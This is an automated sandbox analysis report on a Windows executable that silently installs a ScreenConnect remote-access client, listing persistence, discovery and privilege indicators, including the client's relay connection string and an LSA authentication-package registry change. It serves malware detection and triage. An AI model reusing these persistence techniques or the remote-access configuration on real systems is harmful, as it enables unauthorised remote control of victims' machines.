b30acefcdf5ba41a18270ae8e79dd9ddb445a729ff67aade0abf3259592738ed

Analysis

max time kernel
127s
max time network
128s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
25/09/2024, 02:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b30acefcdf5ba41a18270ae8e79dd9ddb445a729ff67aade0abf3259592738ed.exe
Size

5.4MB
MD5

48d39ee98dc831d41f504bfd5b27ef3d
SHA1

93bd6537bc75914e0a88ee0d8c07dda432998cf4
SHA256

b30acefcdf5ba41a18270ae8e79dd9ddb445a729ff67aade0abf3259592738ed
SHA512

eb1d94a8cd36bd739905c2f20b67eb80101e11351eb9b47c1891de99304634f69e8bb8d46e118566a2cb2f9860b9811c9984c19c1dfec8018eebe7da806ac4d6
SSDEEP

49152:3Dex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoO:F4s6efPQ53JLbd3LINMLaGUW39f0

Score

8^/10

discovery persistence privilege_escalation

Malware Config

Signatures

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (2598aea4daf237ed)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (2598aea4daf237ed)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=instance-kb0euv-relay.screenconnect.com&p=443&s=f2f0e28c-320b-49f6-8a01-eb7b0a4653bc&k=BgIAAACkAABSU0ExAAgAAAEAAQDlzFqbB61j3m7G3hMV4DVxHZ%2b4zgiDcXoshB8axIHyux4wqTUM3ClOtU9ZD0FWynvjUzPRWzN3X8i2DOUnm%2blq%2b9Y%2fzkqC6gCAy1%2f1A5oOLRwHD28JZEgOoOnW9y3Bzcpw6n5W2FZTh9J30XCJ9ADbFZGMg%2bORSWZj71ZoVP5oqjashRiVuuiVDX%2fcDraT6Dk6nWwiKWegCEtx9yiPvBMwrNcUZPspQTsZBdaEJ265lE%2fv0M2BS55BL0bKlqwxzXMboOrUd%2fvJ7G9An65fklnwLR8%2bsOL%2fSx0bZ7CK%2f0yf%2fjYsVdOqoHZ6b4V8aYZWt%2fV9sVVZ1av9ngg9MJgcWPOu&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAR3GmqApQc0eedlH6J8LrvwAAAAACAAAAAAAQZgAAAAEAACAAAACy1V9fSRk%2bPy5Cn7EE0gT8C60%2bH0waYswRNjKiKvUDxAAAAAAOgAAAAAIAACAAAABXb3aI80dAGvA6lVh65pg11GI9%2fxgu8unwbOfRUoJKvaAEAAA5VT9n%2fKVRoq2yAddg58G40W%2f45Kc2I3RKzjj04B2mdNH8YCfrkNhD6gWReXRLNO0Nk1svYTz1rIPAcwjjw%2ff3c%2fiuXVsDP7Auubk1WqwTQ2JvEHRgSfXGyz%2bb3sIyeiXnC7btyYTU6Yum3owESLeQQ%2bvDsw9418b4nWKFc7BdcESQiN6v%2bi2hAJQgA0Mq%2fLJH560bS%2bKROoodnf1WbrDiBllSzknqekr34Fl%2bsQFDARD%2fXsKnLkEQFRFlNaSjbyZgth9NB7vA5N%2fjQd12tYeQCT4Kngv7UPfx3WlQtXv78tRd02BmuFq0lHOlZD%2bFq1zT1fkcBEf%2bokAVJeOQbrv36569Iru0htf4AEJ8iP9KdHb%2bbn53dx3Vj93InEANWjy9aTTogFXW%2bYeug7slO2Jl37V%2bk%2frwZnKu4Dx8i4Ha88mycNC69lOijB40maFsZ8%2fpODmJEwCSYh%2fI2CPIc%2fJyy1rfJ7O%2bGn9YjO0jUjlGG0Tl74YyhFkC6t46XnQNuBT8lKXsA1f9j%2faSnUQg1g7NPRc2Fq6xRADLz8N%2fjz94ZaIxn3L9%2fVsV8P%2f7DHv1r13K4o2JuzjpZe%2fLHmhdBWsj1ElJkVPXismxD3tf80J0kM0dToyXmRSNXbAodqStggNPQQir8iZ9exJHsJSbH1LAFjl1ufK0mEORNhUY4GmfQU89E2XBwBUpcSQeqdAKyKR5JrB3AHdK4yM5SD5ZUC2Tuj%2fUhqiW3F2ZKZ7aGBiYDZk5Sl1AnESs6gRqCnKHIkXyz1sKcr9RP2WlkUVWVdVxqwuDEu9N4MNU%2bjKj2K9wZqB5BXzzGVZtofm1N%2bZzDg59CbJlAyen3aCka5G7nmd8VyJ0B4suandSk37IvBkLrOeu8qJm%2bv%2bQsAgtXNzFKBtXiCtfVCjuq%2b7U930LQeX3%2bei2cUFEmk%2feD5S7M%2bybgRTAJ0CyEQBhgJVKZ8UYW%2bdTwADxeagquOXdD0NWusfGXaoc50yqek4%2fwvbukHAiHMO3g2y1ZbNSED4Z9dukxHFdRJD9vrVPx63xmXeXr6POp2r5umatEY77yeMRLSU98UbOt0l8kq3X6T8kH%2bgLbAw3C1oMLDjgN%2bsMloSK2zSK2oUz6vY%2fR9d5p%2f5DneUdZ1vM5Zxuf5oIWnt%2bDumOa7f9aNtE3aFqV3r3J4QCIQW3Z0%2boUMZS9ruQyipSLlg%2bRbiiCJ6i3v5CKXPUDOuCfpO9G5PnQJsbFuECHKWR1j7SH7L%2bRhuXneEQrrE%2bPeKCkvWDBvBYV7PrT%2fS8295Up5OhadvdHPu4yyCEE71C9pY2HNLexKOZ4U8u8jsq2VT3s3Fya8J5G35qCiBr22N1NN62ZuDCPv17o3EhxFsYcP0VgeVRQRNrDX6xFWNn9vTTa3NvXGR3AAvVoYYAKJpmApcM1S7tM02TmJO4WEKL0vodR3s5Eg80WRwuElIAoQDz%2fo5JNjPWe1q0EovAyzlxU4phWg59odFFrpG39qc9HhnRJlkUOd93aIC9Y1bQSYqcAexYPFlnQreBPDlpMs7SZvto7%2bQrs9lPEvHJNxqb%2fDAL0nyiadFhYQ3P4p5RCcdCU0AAAAAAhEO8%2fE4%2bFVHHM%2fIgpIrnys1aYqxjsEjI3VyEoRaA3mxxLrWok2KTcg%2fE6cyc1XTbq7fPPXa3GtX5LKXMoiky&c=MIYU%20ESPORTS&c=&c=&c=&c=&c=&c=&c=\""	ScreenConnect.ClientService.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

persistence privilege_escalation

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320035003900380061006500610034006400610066003200330037006500640029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (2598aea4daf237ed)\ScreenConnect.WindowsFileManager.exe	msiexec.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\f76fe7b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFFA3.tmp	msiexec.exe
File created	C:\Windows\Installer\{37139833-80F8-2E83-A778-565BBFE68B79}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\{37139833-80F8-2E83-A778-565BBFE68B79}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File created	C:\Windows\Installer\f76fe7b.msi	msiexec.exe
File created	C:\Windows\Installer\f76fe7c.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\f76fe7e.msi	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI21.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI18A.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{37139833-80F8-2E83-A778-565BBFE68B79}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\Installer\f76fe7c.ipi	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
448	ScreenConnect.ClientService.exe
1104	ScreenConnect.WindowsClient.exe

Loads dropped DLL 24 IoCs

pid	Process
2828	MsiExec.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
2740	rundll32.exe
888	MsiExec.exe
2016	MsiExec.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b30acefcdf5ba41a18270ae8e79dd9ddb445a729ff67aade0abf3259592738ed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

Modifies data under HKEY_USERS 49 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe

Modifies registry class 37 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-4DDC-1CD156CECB3F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (2598aea4daf237ed)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\2598aea4daf237ed\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-4DDC-1CD156CECB3F}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\Version = "402784266"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\ProductIcon = "C:\\Windows\\Installer\\{37139833-80F8-2E83-A778-565BBFE68B79}\\DefaultIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-4DDC-1CD156CECB3F}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\PackageCode = "338931738F0838E27A8765B5FB6EB897"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\338931738F0838E27A8765B5FB6EB897	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\33BC3121FF97C4D55289EA4AAD2F73DE\338931738F0838E27A8765B5FB6EB897	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\2598aea4daf237ed\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-2598aea4daf237ed	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-4DDC-1CD156CECB3F}\InprocServer32	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\InstanceType = "0"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\Clients = 3a0000000000	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (2598aea4daf237ed)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\33BC3121FF97C4D55289EA4AAD2F73DE	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList\PackageName = "setup.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\338931738F0838E27A8765B5FB6EB897\Full	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\ProductName = "ScreenConnect Client (2598aea4daf237ed)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-2598aea4daf237ed\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-2598aea4daf237ed\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-4DDC-1CD156CECB3F}\ = "ScreenConnect Client (2598aea4daf237ed) Credential Provider"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\338931738F0838E27A8765B5FB6EB897\SourceList\Media\1 = ";"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2316	msiexec.exe
2316	msiexec.exe
448	ScreenConnect.ClientService.exe
448	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2456	b30acefcdf5ba41a18270ae8e79dd9ddb445a729ff67aade0abf3259592738ed.exe
Token: SeShutdownPrivilege	1496	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	2316	msiexec.exe
Token: SeTakeOwnershipPrivilege	2316	msiexec.exe
Token: SeSecurityPrivilege	2316	msiexec.exe
Token: SeCreateTokenPrivilege	1496	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1496	msiexec.exe
Token: SeLockMemoryPrivilege	1496	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1496	msiexec.exe
Token: SeMachineAccountPrivilege	1496	msiexec.exe
Token: SeTcbPrivilege	1496	msiexec.exe
Token: SeSecurityPrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeLoadDriverPrivilege	1496	msiexec.exe
Token: SeSystemProfilePrivilege	1496	msiexec.exe
Token: SeSystemtimePrivilege	1496	msiexec.exe
Token: SeProfSingleProcessPrivilege	1496	msiexec.exe
Token: SeIncBasePriorityPrivilege	1496	msiexec.exe
Token: SeCreatePagefilePrivilege	1496	msiexec.exe
Token: SeCreatePermanentPrivilege	1496	msiexec.exe
Token: SeBackupPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeShutdownPrivilege	1496	msiexec.exe
Token: SeDebugPrivilege	1496	msiexec.exe
Token: SeAuditPrivilege	1496	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1496	msiexec.exe
Token: SeChangeNotifyPrivilege	1496	msiexec.exe
Token: SeRemoteShutdownPrivilege	1496	msiexec.exe
Token: SeUndockPrivilege	1496	msiexec.exe
Token: SeSyncAgentPrivilege	1496	msiexec.exe
Token: SeEnableDelegationPrivilege	1496	msiexec.exe
Token: SeManageVolumePrivilege	1496	msiexec.exe
Token: SeImpersonatePrivilege	1496	msiexec.exe
Token: SeCreateGlobalPrivilege	1496	msiexec.exe
Token: SeCreateTokenPrivilege	1496	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1496	msiexec.exe
Token: SeLockMemoryPrivilege	1496	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1496	msiexec.exe
Token: SeMachineAccountPrivilege	1496	msiexec.exe
